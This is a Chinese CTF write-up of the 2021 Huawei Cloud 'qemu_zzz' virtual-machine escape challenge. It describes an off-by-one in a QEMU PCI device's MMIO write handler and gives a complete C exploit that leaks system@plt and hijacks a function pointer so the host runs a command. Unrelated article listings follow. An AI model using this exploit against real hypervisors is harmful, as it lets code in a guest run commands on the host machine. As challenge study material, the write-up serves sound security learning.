【qemu逃逸】华为云2021-qemu_zzz

前言

虚拟机用户名:root

无密码

设备逆向

经过逆向分析,可得实例结构体大致结构如下:

其中 self 指向的是结构体本身,cpu_physical_memory_rw 就是这个函数的函数指针。arr 应该是 PCI 设备类结构体没啥用,就直接用数组填充了。

zzz_mmio_read 函数就是读取 buf 中的内容,没啥用,就不看了,重点在 zzz_mmio_write 函数中。

zzz_mmio_write 函数

函数我已经把注释写的非常清楚了,就不详细说了。主要说下漏洞的利用。

漏洞利用

 漏洞很明显就一个 off by one,而且题目无中生有的在 buf 后面搞了个 self 指针,并且在对 dst 进行读写时,是先取的 self 指针,然后 dst/src/len/cpu_..._rw 函数都是根据这个 self 指针来的。

所以利用就很明显了,buf 这个空间我们是可控的,所以我们可以利用 off by one 去将 self 指针进行偏移,使得 dst,len,offset 落在 buf 中,这样就可以实现任意读了。

为啥说是任意读呢?因为要实现写得让 len 的低比特为 0,这里可以利用那个异或操作。

exp:

#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <stdint.h>
#include <string.h>

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

void * mmio_base;
void mmio_init()
{
        int fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR|O_SYNC);
        if (fd < 0) puts("[X] open for resource0"), exit(EXIT_FAILURE);
        mmio_base = mmap(0, 0x100000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
        if (mmio_base < 0) puts("[X] mmap for mmio"), exit(EXIT_FAILURE);
        if (mlock(mmio_base, 0x100000) < 0) puts("[X] mlock for mmio"), exit(EXIT_FAILURE);
        printf("[+] mmio_base: %#p\n", mmio_base);
}

uint64_t gva_to_gpa(void* addr)
{
        uint64_t page;
        int fd = open("/proc/self/pagemap", O_RDONLY);
        if (fd < 0) puts("[X] open for pagemap"), exit(EXIT_FAILURE);
        lseek(fd, ((uint64_t)addr >> 12 << 3), 0);
        read(fd, &page, 8);
        return ((page & ((1ULL << 55) - 1)) << 12) | ((uint64_t)addr & ((1ULL << 12) - 1));
}

void mmio_write(uint64_t addr, uint64_t val)
{
        *(uint64_t*)(mmio_base + addr) = val;
}

int main(int argc, char** argv, char** envp)
{
        mmio_init();
        char * buf = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
        memset(buf, 0, 0x1000);
        mlock(buf, 0x1000);
        uint64_t gpa = gva_to_gpa(buf);
        printf("[+] gpa: %#p\n", gpa);

        //n =  0x1001
        //offset =  0xfee
        //offset ^ 0x209 =  0xde7

        char cmd[8] = "xcalc;\x00\x00";
        *(uint64_t*)(buf + 0x00) = gpa;
        *(uint32_t*)(buf + 0x08) = (0x1000-0xfee)|1;
        *(uint32_t*)(buf + 0x0a) = 0xfee;
        *(uint64_t*)(buf + 0x430) = *(uint64_t*)cmd;
        *(uint64_t*)(buf + 0x430 + 0x8) = 0;
        *(uint64_t*)(buf + 0x430 + 0xa) = 0;
        puts("[+] Step 1");
        mmio_write(0x10, 0);
        mmio_write(0x18, 0x440);
        mmio_write(0x20, gpa >> 12);
        mmio_write(0x60, 0);


        puts("[+] Step 2");
        buf[0] = '\x00';
        buf[1] = '\xf0';
        mmio_write(0x10, 0xfff);
        mmio_write(0x18, 2);
        mmio_write(0x20, gpa >> 12);
        mmio_write(0x60, 0);


        puts("[+] Step 3");
        mmio_write(0x60, 0);
        binary_dump("OOR DATA", buf+2, 0x20);
        uint64_t self_addr = *(uint64_t*)(buf + 2) - 0x10;
        uint64_t system_plt = *(uint64_t*)(buf + 2 + 0x08) - 0x314b40;
        printf("[+] system@plt: %#p\n", system_plt);


        puts("[+] Step 4");
        mmio_write(0x10, 8);
        mmio_write(0x18, 24);
        puts("[+] xor xor");
        mmio_write(0x50, 0);

        buf[0] = '\x00';
        *(uint64_t*)(buf + 1) = self_addr + 0xe20;
        *(uint32_t*)(buf + 1 + 8) = 0;
        *(uint32_t*)(buf + 1 + 8 + 4) = 0;
        *(uint64_t*)(buf + 0x209) = self_addr + 0xe08;
        *(uint64_t*)(buf + 0x209 + 0x8) = system_plt;
        puts("[+] Step 5");
        mmio_write(0x60, 0);

        puts("[+] Triger");
        mmio_write(0x60, 0);
        puts("[+] END!");
        return 0;
}

效果如下:

坑点

就我而言,在我的本地环境中,实例结构体地址的低字节为 0xe0,而由于我们只能修改低字节的数据,所以这里就只能把 self 的低字节修改为 0xf0。

在伪造 dst/len/offset,如果你伪造的 offset = 0xff0,len = 0x11 你会发现,后面异或之后其 len + offset > 0x1001 导致无法进行写入(针对实例结构体而言)。所以这里的 offset 和 len 不能随便伪造。这里写了一个脚本用于计算伪造的 offset 和 len:

for offset in range(0, 0xff0):
        orgi_n = offset + ((0x1000 - offset)|1)
        n = (offset^0x209) + ((((0x1000-offset)|1))^0x209)
        if n == 0x1001 and orgi_n == 0x1001:
                print("n = ", hex(n))
                print("offset = ", hex(offset))
                print("offset ^ 0x209 = ", hex(offset ^ 0x209))
                print("========================================")

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/120262.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

京东按关键词搜索商品列表接口:竞品分析,商品管理,营销策略制定

京东搜索商品列表接口是京东开放平台提供的一种API接口&#xff0c;通过调用该接口&#xff0c;开发者可以获取京东平台上商品的列表数据&#xff0c;包括商品的标题、价格、库存、月销量、总销量、详情描述、图片等信息。 接口的主要作用包括&#xff1a; 市场调研&#xff…

图形学及图形学进展

有段时间没有来CSDN了&#xff0c;最近一直忙于工作&#xff0c;最近图形学方面&#xff0c;特别是重建图形学方面有了比较大的进展&#xff0c;然后NeRF-SLAM向也有不少进展&#xff0c;但由于ChatGPT风光无限&#xff0c;光芒都没有发出来&#xff0c;后续还是继续创作&#…

华为MateBook X Pro笔记本录屏办法

现象&#xff1a;使用ev录屏软件时录不上耳机声音。在我自己的普惠、华硕笔记本上都没有这个问题。 解决办法&#xff0c;使用华为自己的录屏功能。具体如下&#xff1a; 1、找到‘华为控制中心’&#xff1a; 2、使用‘智慧快录’&#xff1a;

ideal一键部署SpringBoot项目jar包到服务器

一 简介 我们在开发环境部署项目一般通过ideal将项目打包成jar包&#xff0c;然后连接linux服务器&#xff0c;将jar手动上传到服务中&#xff0c;重启服务。 概括的说流程是这样的: 本地打包->上传到服务器->kill掉以前的服务->重新启动jar包服务 每次总是循环这一…

【c语言】贪吃蛇

当我们不想学习新知识的时候&#xff0c;并且特别无聊&#xff0c;就会突然先看看别人怎么写游戏的&#xff0c;今天给大家分享的是贪吃蛇&#xff0c;所需要的知识有结构体&#xff0c;枚举&#xff0c;以及easy-x图形库的一些基本函数就完全够用了&#xff0c;本来我想插入游…

Android选项卡TabHost

选项卡主要由TabHost(标签&#xff0c;主人)&#xff0c;TabWidget(微件)和FrameLayout3个组件组成&#xff0c;用于实现一个多标签页的用户界面。 1. TabHost在XML文件中添加&#xff1a; XML布局文件中添加选项卡时必须使用系统id来为各组件指定id属性。 <TabHostandro…

SAE 2.0,让容器化应用开发更简单

云原生容器化应用托管模式的演变 云原生这个概念从提出&#xff0c;到壮大&#xff0c;再到今天的极大普及&#xff0c;始终处于一个不断演进和革新的过程中。云原生体系下应用的托管形态是随着企业应用架构在不断演进的。最早的应用大多是集中式、单体式的&#xff0c;应用通…

深度学习之基于YoloV5-Deepsort人物识别与追踪系统

欢迎大家点赞、收藏、关注、评论啦 &#xff0c;由于篇幅有限&#xff0c;只展示了部分核心代码。 文章目录 一项目简介 二、功能三、系统四. 总结 一项目简介 YoloV5-Deepsort是一种基于深度学习的人物识别与追踪系统&#xff0c;具有较高的准确率和实时性能。 YoloV5是一种…

【hcie-cloud】【4】华为云Stack规划设计之华为云Stack标准组网【中】

文章目录 前言、华为云Stack交付综述华为云Stack标准组网标准组网架构HCS标准组网架构单核心VS双核心组网二层组网VS三层组网 单核心和双核心组网单核心组网设计和配置单核心组网 - 计算节点2网口单核心组网 - 计算节点4网口单核心组网 - 计算节点6网口单核心架构 - 多Region组…

Linux ----------------------- 文本处理工具

&#xff08;一&#xff09;绪论 awk、grep、sed和cut 是Linux 操作文本的四大利器&#xff0c;合称文本四大金刚&#xff0c;也是必须掌握的Linux 命令之一。这四个工具的功能各有侧重&#xff1a; awk&#xff1a;功能最强大&#xff0c;用于处理和格式化文本&#xff0c;可…

IntelliJ IDEA 如何修改默认Maven仓库地址

在使用idea过程中&#xff0c;每次新建项目或者打开项目时&#xff0c;maven仓库地址都会变为默认地址。如何修改默认地址&#xff0c;让其保持不变&#xff0c;如下这种方式可以简单快捷的设置。 1.打开idea&#xff0c;取消项目自动加载 2.点击 Customize,然后再点击 All se…

vSLAM中IMU预积分的作用--以惯性导航的角度分析

作为一个学过一点惯导的工程师&#xff0c;在初次接触视觉slam方向时&#xff0c;最感兴趣的就是IMU预积分了。但为什么要用这个预积分&#xff0c;在看了很多材料和书后&#xff0c;还是感觉模模糊糊&#xff0c;云里雾里。 在接触了vSLAM的更多内容后&#xff0c;站在历史研究…

JVM虚拟机:如何查看自己的JVM默认的垃圾回收器

只需要在程序运行的时候指定下面的参数就可以看到当前自己的JVM默认的垃圾回收器是什么&#xff1f;如下所示&#xff1a; 如上所示&#xff0c;默认使用的是G1回收器&#xff0c;这是我的电脑&#xff0c;因为我的电脑安装jdk的版本是1.9 如果你的jdk的版本是1.8&#xff0c;那…

11 抽象向量空间

抽象向量空间 向量是什么函数什么是线性推论向量空间 这是关于3Blue1Brown "线性代数的本质"的学习笔记。 向量是什么 可以是一个箭头&#xff0c;可以是一组实数&#xff0c;即一个坐标对。 箭头在高维&#xff08;4维&#xff0c;甚至更高&#xff09;空间&…

攻击者滥用日历服务作为 C2 基础设施

谷歌警告多个威胁参与者正在利用其日历服务作为命令和控制&#xff08;C2&#xff09;基础设施。 谷歌警告 称&#xff0c;多个威胁参与者共享一个名为“Google Calendar RAT”的公共概念验证&#xff08;PoC&#xff09;漏洞&#xff0c;该漏洞依赖日历服务来托管命令和控制&…

Redis-----SSM整合redis及redis的注解式开发以及redis的击穿,穿透,雪崩三种解决方案

目录 SSM项目整合Redis 导入pom依赖 配置文件spring-redis.xml redis.properties 配置redis的key生成策略 redis的注解式开发及应用场景 什么是redis的注解式 redis注解式的场景应用 Cacheable 自定义策略 Cacheable可以指定三个属性&#xff0c;value、key和condition…

每日汇评:黄金正在期待鲍威尔的讲话以获取新的方向动力

周三早盘&#xff0c;金价盘整了连续两天的跌势&#xff0c;等待鲍威尔发言&#xff1b; 美元在不同的美联储评论和风险偏好减弱的情况下寻求方向&#xff1b; 黄金价格确认了上升三角形的突破&#xff0c;但美债收益率较低可能会限制跌幅&#xff1b; 周二早些时候&#xf…

大数据中经常使用的指令:

1、Hadoop&#xff1a; 1、关闭Hadoop集群的安全模式&#xff1a; hdfs dfsadmin -safemode leave#查看集群的模式的状态&#xff1a; hdfs dfsadmin -safemode get 2、启动、关闭Hadoop集群&#xff1a; start-all.sh stop-all.sh 3、停止yarn中进程的命令&#xff1a; yar…

【ARM Trace32(劳特巴赫) 使用介绍 2 - Veloce 环境中使用trace32 连接 Cortex-M33】

文章目录 T32MARM 介绍Trace32 .t32 和 .cmm 差异veloce 下启动TRACE321.1.3 TAP 状态机操作命令1.1.3.1 IDCODE&#xff08;Identification Code&#xff09;寄存器 介绍 T32MARM 介绍 T32MARM 是 Lauterbach 的 Trace32 软件包的一部分&#xff0c;专门用于 ARM 基础架构的微…

第七章 块为结构建模 P2|系统建模语言SysML实用指南学习

仅供个人学习记录 流建模 对系统不同组成之间的流做出定义可提供它们之间交互作用的抽象视图 项是定义为流动事物的通用术语。流属性定义了该块可以流入或流出的项 为流动的项建模 项item用于描述一类流动的实体&#xff0c;可以是物质流&#xff08;如物质和能量&#xff…